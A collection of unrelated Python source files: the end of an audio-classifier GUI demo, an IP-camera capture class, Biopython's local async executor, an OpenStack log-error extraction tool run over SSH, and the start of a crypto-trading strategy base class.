self.setup_spectrogram_image()
self.show_output("Feature input size: {}, output size: {}".format(
self.featurizer.input_size,
self.featurizer.output_size))
if self.features_entry.get() != featurizer_model:
self.features_entry.delete(0, END)
self.features_entry.insert(0, featurizer_model)
self.init_data()
def load_classifier(self, classifier_path):
""" load the given compiled ELL classifier for use in processing subsequent audio input """
if classifier_path:
self.classifier = classifier.AudioClassifier(classifier_path, self.categories,
self.ignore_list, self.threshold)
self.show_output("Classifier input size: {}, output size: {}".format(
self.classifier.input_size,
self.classifier.output_size))
if self.classifier_entry.get() != classifier_path:
self.classifier_entry.delete(0, END)
self.classifier_entry.insert(0, classifier_path)
self.init_data()
def init_data(self):
""" initialize the spectrogram_image_data and classifier_feature_data based on the newly loaded model info """
if self.featurizer:
dim = (self.featurizer.output_size, self.max_spectrogram_width)
self.spectrogram_image_data = np.zeros(dim, dtype=float)
if self.spectrogram_image is not None:
self.spectrogram_image.set_data(self.spectrogram_image_data)
if self.classifier:
self.num_classifier_features = self.classifier.input_size // self.featurizer.output_size
dim = (self.num_classifier_features, self.featurizer.output_size)
self.classifier_feature_data = np.zeros(dim, dtype=float)
def accumulate_feature(self, feature_data):
""" accumulate the feature data and pass feature data to classifier """
if self.classifier and self.show_classifier_output:
self.classifier_feature_data = np.vstack((self.classifier_feature_data,
feature_data))[-self.num_classifier_features:,:]
self.evaluate_classifier()
def accumulate_spectrogram_image(self, feature_data):
""" accumulate the feature data into the spectrogram image """
image_data = self.spectrogram_image_data
feature_data = np.reshape(feature_data, [-1,1])
new_image = np.hstack((image_data, feature_data))[:,-image_data.shape[1]:]
image_data[:,:] = new_image
def set_spectrogram_image(self):
""" update the spectrogram image and the min/max values """
self.lock.acquire() # protect access to the shared state
if self.update_minmax and self.show_spectrogram:
min_value = np.min(self.spectrogram_image_data)
max_value = np.max(self.spectrogram_image_data)
if np.isfinite(min_value) and np.isfinite(max_value):
self.min_value = min_value
self.max_value = max_value
eps = 0.1
if self.max_value - self.min_value < eps:
self.max_value = self.min_value + eps
self.spectrogram_image.set_clim(self.min_value, self.max_value)
self.spectrogram_image.set_data(self.spectrogram_image_data)
self.lock.release()
def get_correct_shape(self, shape):
""" for some reason keras stores input shape as (None,80,40), and numpy hates that
so we have to change this to (1,80,40) """
shape = list(shape)
fix = [x if x else 1 for x in shape]
return tuple(fix)
def clear_output(self):
""" remove some of the Output based a the timeout callback """
self.output_text.delete(1.0, 2.0)
def process_output(self):
""" show output that was queued by background thread """
self.lock.acquire()
messages = self.message_queue
self.message_queue = []
self.lock.release()
for msg in messages:
self.show_output(msg)
def show_output(self, message):
""" show output message, or queue it if we are on a background thread """
if self.main_thread != get_ident():
self.message_queue += [message]
return
for line in str(message).split('\n'):
self.output_text.insert(END, "{}\n".format(line))
self.output_text.see("end") # scroll to end
self.after(self.output_clear_time, self.clear_output)
def evaluate_classifier(self):
""" run the classifier model on the current feature data and show the prediction, if any """
if self.evaluate_classifier and self.classifier and self.classifier_feature_data is not None:
prediction, probability, label = self.classifier.predict(self.classifier_feature_data.ravel())
if prediction is not None:
percent = int(100*probability)
if self.last_prediction != prediction or self.probability < probability:
self.last_prediction = prediction
self.probability = probability
self.show_output("<<< DETECTED ({}) {}% {} >>>".format(prediction, percent, label))
def start_playing(self, filename):
""" Play a wav file, and classify the audio. Note we use a background thread to read the
wav file and we setup a UI animation function to draw the sliding spectrogram image, this way
the UI update doesn't interfere with the smoothness of the audio playback """
if self.speaker is None:
self.speaker = speaker.Speaker()
self.stop()
self.reading_input = False
self.wav_file = wav_reader.WavReader(self.sample_rate, self.channels)
self.wav_file.open(filename, self.featurizer.input_size, self.speaker)
def update_func(frame_index):
self.process_output()
if not self.reading_input:
self.after(1, self.on_stopped)
self.set_spectrogram_image()
return (self.spectrogram_image,)
if self.animation:
self.animation.event_source.stop()
self.reading_input = True
# Start animation timer for updating the UI (e.g. spectrogram image) (30 fps is usually fine)
self.animation = animation.FuncAnimation(self.features_figure, update_func, interval=33, blit=True)
# start background thread to read and classify the audio.
self.featurizer.open(self.wav_file)
self.read_input_thread = Thread(target=self.on_read_features, args=())
self.read_input_thread.daemon = True
self.read_input_thread.start()
def start_recording(self):
""" Start recording audio from the microphone nd classify the audio. Note we use a background thread to
process the audio and we setup a UI animation function to draw the sliding spectrogram image, this way
the UI update doesn't interfere with the smoothness of the microphone readings """
if self.microphone is None:
self.microphone = microphone.Microphone(False)
self.stop()
num_channels = 1
self.microphone.open(self.featurizer.input_size, self.sample_rate, num_channels, self.input_device)
def update_func(frame_index):
# this is an animation callback to update the UI every 33 milliseconds.
self.process_output()
self.set_spectrogram_image()
if not self.reading_input:
self.after(1, self.on_stopped)
return (self.spectrogram_image,)
if self.animation:
self.animation.event_source.stop()
self.reading_input = True
# Start animation timer for updating the UI (e.g. spectrogram image) (30 fps is usually fine)
self.animation = animation.FuncAnimation(self.features_figure, update_func, interval=33, blit=True)
# start background thread to read and classify the recorded audio.
self.featurizer.open(self.microphone)
self.read_input_thread = Thread(target=self.on_read_features, args=())
self.read_input_thread.daemon = True
self.read_input_thread.start()
def on_read_features(self):
""" this is the background thread entry point. So we read the feature data in a loop
and pass it to the classifier """
try:
while self.reading_input and self.featurizer:
feature_data = self.featurizer.read()
if feature_data is None:
break # eof
else:
self.lock.acquire()
self.accumulate_feature(feature_data)
if self.show_spectrogram:
self.accumulate_spectrogram_image(feature_data)
self.lock.release()
except:
errorType, value, traceback = sys.exc_info()
print("### Exception reading input: " + str(errorType) + ": " + str(value) + " " + str(traceback))
while traceback:
print(traceback.tb_frame.f_code)
traceback = traceback.tb_next
self.reading_input = False
def stop(self):
""" called when user clicks the stop button, or we reach the end of a wav file input """
# close streams
if self.animation:
self.animation.event_source.stop()
self.animation = None
if self.microphone:
self.microphone.close()
if self.speaker:
self.speaker.close()
if self.wav_file:
self.wav_file.close()
self.wav_file = None
self.reading_input = False
self.last_prediction = None
self.probability = 0
def on_rec_button_click(self):
""" called when user clicks the record button, same button is used to "stop" recording. """
if self.rec_button["text"] == "Rec":
self.rec_button["text"] = "Stop"
self.play_button["text"] = "Play"
self.start_recording()
else:
self.rec_button["text"] = "Rec"
self.on_stop()
def on_play_button_click(self):
""" called when user clicks the record button, same button is used to "stop" playback """
if self.play_button["text"] == "Play":
self.play_button["text"] = "Stop"
self.rec_button["text"] = "Rec"
self.on_play()
else:
self.play_button["text"] = "Play"
self.on_stop()
def on_play(self):
""" called when user clicks the Play button """
filename = self.wav_filename_entry.get()
filename = filename.strip('"')
self.wav_filename = filename
self.settings[self.WAV_FILE_KEY] = filename
self.save_settings()
self.start_playing(filename)
def on_stop(self):
""" called when user clicks the Stop button """
self.reading_input = False
if self.wav_file:
self.wav_file.close()
self.wav_file = None
if self.read_input_thread:
self.read_input_thread.join()
self.read_input_thread = None
self.stop()
def on_stopped(self):
""" called when we reach the end of the wav file playback """
self.play_button["text"] = "Play"
self.stop()
def get_wav_list(self):
if self.wav_filename and os.path.isfile(self.wav_filename):
dir_name = os.path.dirname(self.wav_filename)
if not self.wav_file_list:
self.wav_file_list = [x for x in os.listdir(dir_name) if os.path.splitext(x)[1] == ".wav"]
self.wav_file_list.sort()
return self.wav_file_list
def select_wav_file(self, filename):
self.wav_filename = filename
# show the file in the UI
self.wav_filename_entry.delete(0, END)
if self.wav_filename:
self.wav_filename_entry.insert(0, self.wav_filename)
# and automatically play the file.
self.on_play()
def on_minus_key(self, event):
""" When user presses the plus button we reverse to the previous wav file in the current folder.
This way you can easily step through all the training wav files """
if self.get_wav_list():
i = self.wav_file_list.index(os.path.basename(self.wav_filename))
if i - 1 >= 0:
next_wav_file = self.wav_file_list[i - 1]
dir_name = os.path.dirname(self.wav_filename)
self.select_wav_file(os.path.join(dir_name, next_wav_file))
def on_plus_key(self, event):
""" When user presses the plus button we advance to the next wav file in the current folder.
This way you can easily step through all the training wav files """
if self.get_wav_list():
i = self.wav_file_list.index(os.path.basename(self.wav_filename))
if i + 1 < len(self.wav_file_list):
next_wav_file = self.wav_file_list[i + 1]
dir_name = os.path.dirname(self.wav_filename)
self.select_wav_file(os.path.join(dir_name, next_wav_file))
def init_ui(self):
""" setup the GUI for the app """
self.master.title("Test")
self.pack(fill=BOTH, expand=True)
# Input section
input_frame = LabelFrame(self, text="Input")
input_frame.bind("-", self.on_minus_key)
input_frame.bind("+", self.on_plus_key)
input_frame.pack(fill=X)
self.play_button = Button(input_frame, text="Play", command=self.on_play_button_click)
self.play_button.pack(side=RIGHT, padx=4)
self.rec_button = Button(input_frame, text="Rec", command=self.on_rec_button_click)
self.rec_button.pack(side=RIGHT, padx=4)
self.wav_filename_entry = Entry(input_frame, width=24)
self.wav_filename_entry.pack(fill=X)
self.wav_filename_entry.delete(0, END)
if self.wav_filename:
self.wav_filename_entry.insert(0, self.wav_filename)
# Feature section
features_frame = LabelFrame(self, text="Features")
features_frame.pack(fill=X)
features_control_frame = Frame(features_frame)
features_control_frame.pack(fill=X)
load_features_button = Button(features_control_frame, text="Load", command=self.on_load_featurizer_model)
load_features_button.pack(side=RIGHT)
self.features_entry = Entry(features_control_frame, width=8)
self.features_entry.pack(fill=X)
self.features_entry.delete(0, END)
if self.featurizer_model:
self.features_entry.insert(0, self.featurizer_model)
viz_frame = Frame(features_frame)
viz_frame.pack(fill=X)
self.features_figure = Figure(figsize=(5, 4), dpi=100)
self.subplot = self.features_figure.add_subplot(111)
canvas = FigureCanvasTkAgg(self.features_figure, master=viz_frame)
canvas.draw()
canvas.show()
canvas.get_tk_widget().pack(side=TOP, fill=BOTH, expand=True)
# Classifier section
classifier_frame = LabelFrame(self, text="Classifier")
classifier_frame.pack(fill=X)
load_classifier_button = Button(classifier_frame, text="Load", command=self.on_load_classifier)
load_classifier_button.pack(side=RIGHT)
self.classifier_entry = Entry(classifier_frame, width=8)
self.classifier_entry.pack(fill=X)
self.classifier_entry.delete(0, END)
if self.classifier_model:
self.classifier_entry.insert(0, self.classifier_model)
# Output section
output_frame = LabelFrame(self, text="Output")
output_frame.pack(fill=BOTH, expand=True)
self.output_text = Text(output_frame)
self.output_text.pack(fill=BOTH, padx=4, expand=True)
def setup_spectrogram_image(self):
""" this need to be called if you load a new feature model, because the featurizer output size might have
changed. """
if self.featurizer:
dim = (self.featurizer.output_size, self.max_spectrogram_width)
self.spectrogram_image_data = np.zeros(dim, dtype=float)
self.subplot.clear()
self.spectrogram_image = self.subplot.imshow(self.spectrogram_image_data, vmin=self.min_value,
vmax=self.max_value, origin="lower", animated=True, cmap=pyplot.get_cmap(self.colormap_name))
def on_load_featurizer_model(self):
""" called when user clicks the Load button for the feature model """
filename = self.features_entry.get()
filename = filename.strip('"')
self.settings[self.FEATURIZER_MODEL_KEY] = filename
self.save_settings()
self.stop()
self.load_featurizer_model(filename)
def on_load_classifier(self):
""" called when user clicks the Load button for the feature model """
self.classifier_model = self.classifier_entry.get()
self.settings[self.CLASSIFIER_MODEL_KEY] = self.classifier_model
self.save_settings()
self.stop()
self.load_classifier(self.classifier_model)
def main(featurizer_model=None, classifier=None, sample_rate=None, channels=None, input_device=None, categories=None,
image_width=80, ignore_label=None, threshold=None, wav_file=None, clear=5):
""" Main function to create root UI and AudioDemo object, then run the main UI loop """
root = tk.Tk()
root.geometry("800x800")
app = AudioDemo(featurizer_model, classifier, sample_rate, channels, input_device, categories, image_width,
ignore_label, threshold, wav_file, clear)
root.bind("+", app.on_plus_key)
root.bind("-", app.on_minus_key)
while True:
try:
root.mainloop()
break
except UnicodeDecodeError:
pass
if __name__ == "__main__":
arg_parser = argparse.ArgumentParser(description="Test a feature model and optional classifier in a handy GUI app")
# options
arg_parser.add_argument("--featurizer", "-m", help="Compiled ELL model to use for generating features",
default=None)
arg_parser.add_argument("--classifier", "-c", help="Compiled ELL model to use for classification",
default=None)
arg_parser.add_argument("--sample_rate", "-s", help="Audio sample rate expected by classifier",
default=16000, type=int)
arg_parser.add_argument("--channels", "-ch", help="Audio channels expected by classifier",
default=1, type=int)
arg_parser.add_argument("--input_device", "-d", help="Input device",
default=None, type=int)
arg_parser.add_argument("--categories", help="Provide categories file that provide labels for each predicted class",
default=None)
arg_parser.add_argument("--wav_file", help="Provide an input wav file to test",
default=None)
arg_parser.add_argument("--image_width", help="Provide the display width of spectrogram image",
type=int, default=80)
arg_parser.add_argument("--ignore_label", help="Ignore the given label when predicted",
type=int, default=None)
arg_parser.add_argument("--threshold", help="Ignore predictions below given confidence threshold (0 to 1)",
type=float, default=0)
arg_parser.add_argument("--clear", help="Seconds before clearing output (default 5)",
type=float, default=5)
args = arg_parser.parse_args()
main(args.featurizer, args.classifier,
args.sample_rate, args.channels, args.input_device, args.categories,
args.image_width, args.ignore_label, args.threshold, args.wav_file, args.clear)
|
Camera.py
|
# Camera Class
# Brandon Joffe
# 2016
#
# Copyright 2016, Brandon Joffe, All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import time
import cv2
import ImageUtils
import logging
import SurveillanceSystem
import MotionDetector
import FaceDetector
#logging.basicConfig(level=logging.DEBUG,
# format='(%(threadName)-10s) %(message)s',
# )
logger = logging.getLogger(__name__)
CAPTURE_HZ = 25.0 # Determines frame rate at which frames are captured from IP camera
class IPCamera(object):
"""The IPCamera object continually captures frames
from a camera and makes these frames available for
proccessing and streamimg to the web client. A
IPCamera can be processed using 5 different processing
functions detect_motion, detect_recognise,
motion_detect_recognise, segment_detect_recognise,
detect_recognise_track. These can be found in the
SureveillanceSystem object, within the process_frame function"""
def __init__(self,camURL, cameraFunction, dlibDetection, fpsTweak):
logger.info("Loading Stream From IP Camera: " + camURL)
self.motionDetector = MotionDetector.MotionDetector()
self.faceDetector = FaceDetector.FaceDetector()
self.processing_frame = None
self.tempFrame = None
self.captureFrame = None
self.streamingFPS = 0 # Streaming frame rate per second
self.processingFPS = 0
self.FPSstart = time.time()
self.FPScount = 0
self.motion = False # Used for alerts and transistion between system states i.e from motion detection to face detection
self.people = {} # Holds person ID and corresponding person object
self.trackers = [] # Holds all alive trackers
self.cameraFunction = cameraFunction
self.dlibDetection = dlibDetection # Used to choose detection method for camera (dlib - True vs opencv - False)
self.fpsTweak = fpsTweak # used to know if we should apply the FPS work around when you have many cameras
self.rgbFrame = None
self.faceBoxes = None
self.captureEvent = threading.Event()
self.captureEvent.set()
self.peopleDictLock = threading.Lock() # Used to block concurrent access to people dictionary
uri = camURL
latency = 100
width = 1280
height = 720 #738
framerate = 25
#gst_str = ("rtspsrc location={} latency={} ! rtph264depay ! h264parse ! omxh264dec ! nvvidconv ! video/x-raw, width=(int){}, height=(int){}, framerate={}/1, format=(string)BGRx ! videoconvert ! appsink").format(uri, latency, width, height, framerate)
#gst_str = ("rtspsrc location={} latency={} ! queue ! rtph264depay ! queue ! h264parse ! omxh264dec ! nvvidconv ! video/x-raw,format=BGRx ! videoconvert ! video/x-raw,format=BGR ! appsink").format(uri, latency)
gst_str = "rtspsrc location={} ! application/x-rtp, media=video ! rtph264depay ! h264parse ! nvv4l2decoder ! nvvidconv ! video/x-raw, format=BGRx ! videoconvert ! video/x-raw, format=BGR ! appsink".format(uri)
self.video = cv2.VideoCapture(gst_str, cv2.CAP_GSTREAMER)
#self.video = cv2.VideoCapture(camURL) # VideoCapture object used to capture frames from IP camera
logger.info("We are opening the video feed.")
self.url = camURL
logger.info("Video feed open.")
self.dump_video_info() # logging every specs of the video feed
# Start a thread to continuously capture frames.
# The capture thread ensures the frames being processed are up to date and are not old
self.captureLock = threading.Lock() # Sometimes used to prevent concurrent access
self.captureThread = threading.Thread(name='video_captureThread',target=self.get_frame)
self.captureThread.daemon = True
self.captureThread.start()
self.captureThread.stop = False
def __del__(self):
self.video.release()
def get_frame(self):
logger.debug('Getting Frames')
FPScount = 0
warmup = 0
#fpsTweak = 0 # set that to 1 if you want to enable Brandon's fps tweak. that break most video feeds so recommend not to
FPSstart = time.time()
while True:
success, frame = self.video.read()
self.captureEvent.clear()
if success:
self.captureFrame = frame
self.captureEvent.set()
FPScount += 1
if FPScount == 5:
self.streamingFPS = 5/(time.time() - FPSstart)
FPSstart = time.time()
FPScount = 0
if self.fpsTweak:
if self.streamingFPS != 0: # If frame rate gets too fast slow it down, if it gets too slow speed it up
if self.streamingFPS > CAPTURE_HZ:
time.sleep(1/CAPTURE_HZ)
else:
time.sleep(self.streamingFPS/(CAPTURE_HZ*CAPTURE_HZ))
def read_jpg(self):
"""We are using Motion JPEG, and OpenCV captures raw images,
so we must encode it into JPEG in order to stream frames to
the client. It is nessacery to make the image smaller to
improve streaming performance"""
capture_blocker = self.captureEvent.wait()
frame = self.captureFrame
frame = ImageUtils.resize_mjpeg(frame)
ret, jpeg = cv2.imencode('.jpg', frame)
return jpeg.tostring()
def read_frame(self):
capture_blocker = self.captureEvent.wait()
frame = self.captureFrame
return frame
def read_processed(self):
frame = None
with self.captureLock:
frame = self.processing_frame
while (frame is None): # If there are problems, keep retrying until an image can be read.
with self.captureLock:
frame = self.processing_frame
frame = ImageUtils.resize_mjpeg(frame)
ret, jpeg = cv2.imencode('.jpg', frame)
return jpeg.tostring()
def dump_video_info(self):
logger.info("---------Dumping video feed info---------------------")
logger.info("Position of the video file in milliseconds or video capture timestamp: ")
logger.info(self.video.get(cv2.CAP_PROP_POS_MSEC))
logger.info("0-based index of the frame to be decoded/captured next: ")
logger.info(self.video.get(cv2.CAP_PROP_POS_FRAMES))
logger.info("Relative position of the video file: 0 - start of the film, 1 - end of the film: ")
logger.info(self.video.get(cv2.CAP_PROP_POS_AVI_RATIO))
logger.info("Width of the frames in the video stream: ")
logger.info(self.video.get(cv2.CAP_PROP_FRAME_WIDTH))
logger.info("Height of the frames in the video stream: ")
logger.info(self.video.get(cv2.CAP_PROP_FRAME_HEIGHT))
logger.info("Frame rate:")
logger.info(self.video.get(cv2.CAP_PROP_FPS))
logger.info("4-character code of codec.")
logger.info(self.video.get(cv2.CAP_PROP_FOURCC))
logger.info("Number of frames in the video file.")
logger.info(self.video.get(cv2.CAP_PROP_FRAME_COUNT))
logger.info("Format of the Mat objects returned by retrieve() .")
logger.info(self.video.get(cv2.CAP_PROP_FORMAT))
logger.info("Backend-specific value indicating the current capture mode.")
logger.info(self.video.get(cv2.CAP_PROP_MODE))
logger.info("Brightness of the image (only for cameras).")
logger.info(self.video.get(cv2.CAP_PROP_BRIGHTNESS))
logger.info("Contrast of the image (only for cameras).")
logger.info(self.video.get(cv2.CAP_PROP_CONTRAST))
logger.info("Saturation of the image (only for cameras).")
logger.info(self.video.get(cv2.CAP_PROP_SATURATION))
logger.info("Hue of the image (only for cameras).")
logger.info(self.video.get(cv2.CAP_PROP_HUE))
logger.info("Gain of the image (only for cameras).")
logger.info(self.video.get(cv2.CAP_PROP_GAIN))
logger.info("Exposure (only for cameras).")
logger.info(self.video.get(cv2.CAP_PROP_EXPOSURE))
logger.info("Boolean flags indicating whether images should be converted to RGB.")
logger.info(self.video.get(cv2.CAP_PROP_CONVERT_RGB))
logger.info("--------------------------End of video feed info---------------------")
|
Local.py
|
# Copyright 2007 by Tiago Antao <tiagoantao@gmail.com>. All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
'''
Asynchronous local execution.
Supports multicore architectures.
'''
from Bio.PopGen.Async import Async
import threading
class Local(Async):
'''Execution on Local machine.
'''
def __init__(self, num_cores=1):
'''Constructor.
parameters:
num_cores - Number of cores (for multiprocessor machines,
multiply accordingly)
'''
Async.__init__(self)
self.num_cores = num_cores
self.cores_used = 0
def _run_program(self, id, hook, parameters, input_files):
'''Run program.
For parameters, please check Async.run_program.
Either runs a program if a core is available or
schedules it.
'''
self.access_ds.acquire()
self.waiting.append((id, hook, parameters, input_files))
if self.cores_used < self.num_cores:
self.cores_used += 1
threading.Thread(target=self.start_work).run()
self.access_ds.release()
def start_work(self):
'''Starts work.
Thread initial point.
While there are tasks to be done, runs them.
The thread dies as soon as there is nothing waiting to be
executed.
'''
self.access_ds.acquire()
while (len(self.waiting) > 0):
id, hook, parameters, input_files = self.waiting[0]
del self.waiting[0]
self.running[id] = True
self.access_ds.release()
ret_code, output_files = hook.run_job(parameters, input_files)
self.access_ds.acquire()
del self.running[id]
self.done[id] = ret_code, output_files
self.cores_used -= 1
self.access_ds.release()
|
LogTool_Plugin.py
|
#!/usr/bin/python
# Copyright 2018 Arkady Shtempler.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import shutil
from Common import *
from Params import *
import unittest
import warnings
import threading
usage = ['LogTool - extracts Overcloud Errors and provides statistics',
'1) Set needed configuration in Params.py configuration file.',
'2) cd python3 -m unittest LogTool_Plugin.LogTool.test_1_Export_Overcloud_Errors',
'3) python3 -m unittest LogTool_Plugin.LogTool',
'4) Start specific test: "python3 -m unittest LogTool_Plugin.LogTool.test_1_Export_Overcloud_Errors" to start this script']
if len(sys.argv)==1 or (sys.argv[1] in ['-h','--help']):
spec_print(usage, 'yellow')
sys.exit(1)
# Parameters #
errors_on_execution = {}
competed_nodes={}
workers_output={}
### Check given user_start_time ###
if check_time(user_start_time)!=True:
print_in_color('FATAL ERROR - provided "user_start_time" value: "'+user_start_time+'" in Params.py is incorrect!!!')
sys.exit(1)
### Get all nodes ###
nodes=[]
all_nodes = exec_command_line_command('source ' + source_rc_file_path + 'stackrc;openstack server list -f json')['JsonOutput']
all_nodes = [{'Name': item['name'], 'ip': item['networks'].split('=')[-1]} for item in all_nodes]
for node in all_nodes:
if check_ping(node['ip']) is True:
nodes.append(node)
else:
print_in_color('Warning - ' + str(node) + ' will be skipped, due to connectivity issue!!!', 'yellow')
### Create Result Folders ###
if result_dir in os.listdir('.'):
shutil.rmtree(result_dir)
os.mkdir(result_dir)
class LogTool(unittest.TestCase):
@staticmethod
def raise_warning(msg):
warnings.warn(message=msg, category=Warning)
@staticmethod
def run_on_node(node):
print('-------------------------')
print(node)
print('--------------------------')
print('\n' + '-' * 40 + 'Remote Overcloud Node -->', str(node) + '-' * 40)
result_file = node['Name'].replace(' ', '') + '.log'
s = SSH(node['ip'], user=overcloud_ssh_user, key_path=overcloud_ssh_key)
s.ssh_connect_key()
s.scp_upload('Extract_On_Node.py', overcloud_home_dir + 'Extract_On_Node.py')
s.ssh_command('chmod 777 ' + overcloud_home_dir + 'Extract_On_Node.py')
command = "sudo " + overcloud_home_dir + "Extract_On_Node.py '" + str(
user_start_time) + "' " + overcloud_logs_dir + " '" + grep_string + "'" + ' ' + result_file + ' ' + save_raw_data+' None '+log_type
print('Executed command on host --> ', command)
com_result = s.ssh_command(command)
print(com_result['Stdout']) # Do not delete me!!!
if 'SUCCESS!!!' in com_result['Stdout']:
print_in_color(str(node) + ' --> OK', 'green')
workers_output[str(node)]=com_result['Stdout'].splitlines()[-2]
competed_nodes[node['Name']] = True
else:
print_in_color(str(node) + ' --> FAILED', 'yellow')
self.raise_warning(str(node) + ' --> FAILED')
errors_on_execution[node['Name']] = False
s.scp_download(overcloud_home_dir + result_file, os.path.join(os.path.abspath(result_dir), result_file+'.gz'))
# Clean all #
files_to_delete = ['Extract_On_Node.py', result_file]
for fil in files_to_delete:
s.ssh_command('rm -rf ' + fil)
s.ssh_close()
""" Start LogTool and export Errors from Overcloud, execution on nodes is running in parallel"""
def test_1_Export_Overcloud_Errors(self):
print('\ntest_1_Export_Overcloud_Errors')
mode_start_time = time.time()
threads=[]
for node in nodes:
t=threading.Thread(target=self.run_on_node, args=(node,))
threads.append(t)
t.start()
for t in threads:
t.join()
script_end_time = time.time()
if len(errors_on_execution) == 0:
spec_print(['Completed!!!', 'Result Directory: ' + result_dir,
'Execution Time: ' + str(script_end_time - mode_start_time) + '[sec]'], 'green')
else:
if len(errors_on_execution)==len(nodes):
spec_print(['Execution has failed for all nodes :-( ',
'Execution Time: ' + str(script_end_time - mode_start_time) + '[sec]'],'red')
else:
spec_print(['Completed with failures!!!', 'Result Directory: ' + result_dir,
'Execution Time: ' + str(script_end_time - mode_start_time) + '[sec]',
'Failed nodes:'] + [k for k in list(errors_on_execution.keys())], 'yellow')
if len(competed_nodes)==0:
self.raise_warning('LogTool execution has failed to be executed on all Overcloud nodes :-(')
""" Start LogTool and export Errors from Undercloud """
def test_2_Export_Undercloud_Errors(self):
print('\ntest_2_Export_Undercloud_Errors')
mode_start_time = time.time()
result_file = 'Undercloud.log'
log_root_dir=str(undercloud_logs)
command = "sudo python3 Extract_On_Node.py '" + str(user_start_time) + "' " + "'" + log_root_dir + "'" + " '" + grep_string + "'" + ' ' + result_file
com_result=exec_command_line_command(command)
shutil.move(result_file+'.gz', os.path.join(os.path.abspath(result_dir),result_file+'.gz'))
end_time=time.time()
if com_result['ReturnCode']==0:
spec_print(['Completed!!!','Result Directory: '+result_dir,'Execution Time: '+str(end_time-mode_start_time)+'[sec]'],'green')
workers_output['UndercloudNode'] = com_result['CommandOutput'].splitlines()[-2]
else:
spec_print(['Completed!!!', 'Result Directory: ' + result_dir,
'Execution Time: ' + str(end_time - mode_start_time) + '[sec]'], 'red')
if com_result['ReturnCode']!=0:
self.raise_warning('LogTool execution has failed to be executed on Underloud logs :-(')
""" This test will create a Final report. The report file will be created only when ERRORs have been detected.
Report file will be used as indication to ansible to PASS or FAIl, in case of failure it will "cat" its
content.
"""
def test_3_create_final_report(self):
print('\ntest_3_create_final_report')
report_file_name = 'LogTool_Report.log'
if report_file_name in os.listdir('.'):
os.remove(report_file_name)
report_data=''
for key in workers_output:
if 'Total_Number_Of_Errors:0' not in workers_output[key]:
report_data+='\n'+key+' --> '+workers_output[key]
if len(report_data)!=0:
append_to_file(report_file_name,report_data+
'\n\nFor more details, check LogTool result files on your setup:'
'\n'+os.path.abspath(result_dir))
|
base_strategy.py
|
from threading import Thread
from queue import Queue
import logging
from ...markets import market_watcher
from ...markets import market_simulator
from ...markets import market
from ...markets import position
from ...publishers.ticker import Ticker
strategies = []
logger = logging.getLogger(__name__)
class BaseStrategy:
"""An abstract class that implements the backbone functionality of a strategy
Stragies inheriting from this class can specify the following things in their __init__ method:
- buy_signal - Signal generator to initiate the opening of a long position
- order_quantity - Quantity of asset to buy
- profit_target_percent - Profit target percent to dictate when to liquidate position
- position_limit - Number of concurrent positions to be open at the same time
- fixed_stoploss_percent - Percentage of order price to set a fixed stoploss on each opened position
- trailing_stoploss_percent - Percentage of each candle price to set fixed stoploss (updated each candle)
All strategies should pass in the following in the constructor:
- interval - time period for candles (i.e. '5m')
- exchange - ccxt supported exchange (i.e. 'bittrex' or 'binance')
- base_currency - currency to trade (i.e. 'ETH')
- quote_currency - currency quotes are in (i.e. 'BTC')
- is_simulated - should this be a simulation? True or False
- simulated_quote_balance - the starting balance of the simulation
A strategy inheriting from this class is an algorithm running on a specific exchange on a single trading pair
"""
def __init__(self, default, limits, portfolio_id=None, strategy_id=None):
self.market = None
self.portfolio_id = portfolio_id
self.__thread = Thread(target=self.__run)
self.__jobs = Queue() # create job queue
self.running = False
self.positions = []
self.interval = default['interval']
self.is_simulated = default['is_simulated']
self.name = None
self.process_limits(limits)
self.exchange = default['exchange']
self.base_currency = default['base_currency']
self.quote_currency = default['quote_currency']
if self.is_simulated:
self.market = market_simulator.MarketSimulator(
self.exchange,
self.base_currency,
self.quote_currency,
self.capital_base,
self
)
else:
self.market = market.Market(
self.exchange,
self.base_currency,
self.quote_currency,
self
)
strategies.append(self)
self.strategy_id = strategy_id
self.ui_messages = Queue()
self.ticker = Ticker
def add_session(self, session):
self.session = session
self.market.add_session(session)
def add_keys(self, keys):
self.market.add_keys(keys)
def add_ticker(self, ticker):
self.ticker = ticker
def process_limits(self, limits):
self.capital_base = limits['capital_base']
self.order_quantity = limits['order_quantity']
self.position_limit = limits['position_limit']
self.profit_target_percentage = limits['profit_target_percentage']
self.fixed_stoploss_percentage = limits['fixed_stoploss_percentage']
self.trailing_stoploss_percentage = limits['trailing_stoploss_percentage']
def start(self):
"""Start thread and subscribe to candle updates"""
self.__jobs.put(lambda: market_watcher.subscribe(self.market.exchange.id, self.market.base_currency, self.market.quote_currency, self.interval, self.__update, self.session, self.ticker))
self.__thread.start()
def run_simulation(self):
"""Queue simulation when market data has been synced"""
if self.is_simulated:
market_watcher.subscribe_historical(self.market.exchange.id, self.market.base_currency,
self.market.quote_currency, self.interval, self.__run_simulation, self.session, self.ticker)
def __run_simulation(self, candle_set=None):
"""Start a simulation on historical candles (runs update method on historical candles)"""
def run_simulation(candle_set):
self.add_message("Simulating strategy for market " + self.market.exchange.id + " " + self.market.analysis_pair)
if candle_set is None:
candle_set = self.market.get_historical_candles(self.interval, 1000)
self.simulating = True
for entry in candle_set:
self.__update(candle=entry)
self.simulating = False
self.__jobs.put(lambda: run_simulation(candle_set))
def __update(self, candle):
"""Run updates on all markets/indicators/signal generators running in strategy"""
def update(candle):
# print("Updating strategy")
self.add_message("Received new candle")
self.market.update(self.interval, candle)
self.__update_positions()
self.on_data(candle)
self.add_message("Simulation BTC balance: " + str(self.market.get_wallet_balance()))
self.__jobs.put(lambda: update(candle))
def on_data(self, candle):
"""Will be called on each candle, this method is to be overriden by inheriting classes"""
raise NotImplementedError()
